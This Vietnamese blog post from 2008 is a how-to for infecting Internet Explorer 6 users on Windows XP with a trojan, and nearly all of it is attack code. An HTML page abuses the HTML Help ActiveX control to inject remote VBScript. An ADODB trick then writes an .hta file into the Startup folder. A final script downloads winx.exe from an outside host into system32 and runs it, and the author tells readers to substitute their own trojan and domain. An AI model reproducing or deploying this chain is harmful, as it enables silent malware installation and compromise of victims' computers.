Jun 10, 2008
70 Views

code Trojan

Written by

– Microsoft Internet Explorer 6.0
– Microsoft Windows XP Pro SP2
– Microsoft Windows XP Home SP2

Tạo trang web nội dung bất kỳ (ví dụ hack.htm ) có đính kèm đoạn mã sau đây :

<OBJECT id=”localpage” type=”application/x-oleobject” classid=”clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11″ height=7%
style=”position:absolute;top:140;left:72;z-index:100;” codebase=”hhctrl.ocx#Version=5,2,3790,1194″ width=”7%”>
<PARAM name=”Command” value=”Related Topics, MENU”>
<PARAM name=”Button” value=”Text:Just a button”>
<PARAM name=”Window” value=”$global_blank”>
<PARAM name=”Item1″ value=”command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blu rbs\tools.htm”>
</OBJECT>

<OBJECT id=”inject” type=”application/x-oleobject” classid=”clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11″ height=7%
style=”position:absolute;top:140;left:72;z-index:100;” codebase=”hhctrl.ocx#Version=5,2,3790,1194″ width=”7%”>
<PARAM name=”Command” value=”Related Topics, MENU”>
<PARAM name=”Button” value=”Text:Just a button”>
<PARAM name=”Window” value=”$global_blank”>
<PARAM name=”Item1″ value=’command;javascript:execScript(“document.wri te(\”<s cript language=\\\”vbscript\\\” src=\\\”link trojan cua ban\\\”\”+String.fromC harCode(62)+\”</scr\”+\”ipt\”+String.fromCharCode(62))”)’ >
</OBJECT>
<script>
localpage.HHClick();
setTimeout(“inject.HHClick()”,100);
</script>

Tiếp theo tạo một trang atthta.txt với nội dung

Dim Conn, rs
Set Conn = CreateObject(“ADODB.Connection”)
Conn.Open “Driver={Microsoft Text Driver (*.txt; *.csv)};” & _
“Dbq=http://www.vnbrain.name;” & _
“Extensions=asc,csv,tab,txt;” & _
“Persist Security Info=False”
Dim sql
sql = “SELECT * from attack.txt”
set rs = conn.execute(sql)
set rs =CreateObject(“ADODB.recordset”)
rs.Open “SELECT * from attack.txt”, conn
rs.Save “C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta”, adPersistXML
rs.close
conn.close
window.close

Tiếp theo tạo thêm file attack.txt nội dung như sau :

“nMam : nO mOrE HackInG”
“<script language=vbscript> crap = “””
“””: on error resume next: crap = “””
“”” : set o = CreateObject(“”msxml2.XMLHTTP””) : crap=”””
“”” : o.open “”GET””,””http://viethacker.name/winx.exe””,False : crap=”””
“”” : o.send : crap=”””
“”” : set s = createobject(“”adodb.stream””) : crap=”””
“”” : s.type=1 : crap=”””
“”” : s.open : crap=”””
“”” : s.write o.responseBody : crap=”””
“”” : s.savetofile “”C:\WINDOWS\system32\winx.exe””,2 : crap=”””
“”” : Set ws = CreateObject(“”WScript.Shell””) : crap=”””
“”” : ws.Run “”C:\WINDOWS\system32\winx.exe””, 3, FALSE : crap=”””
“””</script> crap=”””

thay viethacker.name thành đường dẫn đúng Thay con winx.exe thành trojan

Article Categories:
Virut/Trojan
    http://linholiver.com

    https://linholiver.com/diary/about/